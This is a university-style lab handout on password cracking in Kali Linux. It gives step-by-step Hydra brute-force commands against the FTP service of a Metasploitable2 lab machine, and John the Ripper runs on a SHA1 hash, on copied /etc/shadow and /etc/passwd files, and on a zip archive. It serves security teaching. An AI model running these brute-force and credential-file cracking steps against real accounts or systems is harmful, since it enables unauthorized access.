Lab-08: Working with Password Cracking Tools in Kali Linux

Lab Objective:
The objective of this lab is to explore and understand the functionality of password-cracking
tools available in Kali Linux, their practical applications, and ethical considerations. The
focus will be on tools such as Hydra and John the Ripper.

Lab Requirements:
• A system running Kali Linux.
• Sample password-protected files or services.
• Vulnerable Machine : Metasploitable2

Tools Overview:
1. Hydra: Used for brute-force attacks on remote authentication services.
2. John : the Ripper: A fast password cracker for local file analysis.

Lab Task:
Download Word List file:
• Search the password wordlist by browsing Google “password wordlist
download”

Part 1: Using Hydra for Brute Force Attacks

1. Open a terminal in Kali Linux.
2. Identify a service for testing, e.g., SSH, FTP, or HTTP.
Syntax: hydra -1 [username] -P [password_list.txt] [target IP]
service_name

Step-1: Make or download password list file and name it as list.txt

 Step-2: Target Machine- Metasploitable2
IP: 192.168.7.6
Step-3: Testing ftp Service, Username known and we find the password, type the
following command:
# hydra -l msfadmin -P list.txt 192.168.7.6 ftp

Step-4: When password is known and we have to find username. Make/ download users list.
# hydra -L user.txt -p msfadmin 192.168.7.6 ftp

Step-5, both username and password unknown

# hydra -L user.txt -P list.txt 192.168.7.6 ftp
 Step-6, saving output in file

# hydra -L user.txt -P list.txt 192.168.7.6 ftp -o myoutput1.txt

3. Observe the results and note any successful login attempts.

Part 2: Cracking Password Hashes with John the Ripper
# sudo apt install john
SINGLE CRACK MODE:
1. Create a file containing encrypted password
# nano crack.txt

stealth:d776dd32d662b8efbdf853837269bd725203c579

Paste the hash key in the crack file and save it and exit.
Type the following in the terminal to run in Single crack mode:
# john --single --format=raw-sha1 crack.txt

# john --show crack.txt

WORDLIST MODE/ DICTIONARY MODE:
Download the wordlist file and rename as mylist.txt and save it in the Kali Desktop
Cracking the password of Kali Linux User:

1. Obtain a sample hash file from /etc/shadow and /etc/passwd.

2. Obtain the user details from the files as
sudo cat passwd
Copy the user information and create a new file as passwd (nano passwd ) in the
Desktop and save the copied information in the files.
Similarly, create a shadow file in the Desktop by copying the user details from
/etc/shadow file.
3. Format the hash file using unshadow (for shadow files). At the desktop of Kali, open
the terminal and type
unshadow passwd shadow > new.txt

sudo john --wordlist=mylist.txt --format=crypt new.txt

Cracking zip file password

Target zip file: myfiles.zip
Type the following at the terminal:
1. # sudo zip2john myfiles.zip > pass1.txt

2. # sudo john --format=zip pass1.txt

Conclusion:
• Hydra: Successfully identified weak credentials for the test FTP service.
• John the Ripper: Recovered simple passwords from the provided hash file
within a reasonable timeframe.
Faculty Signature ...............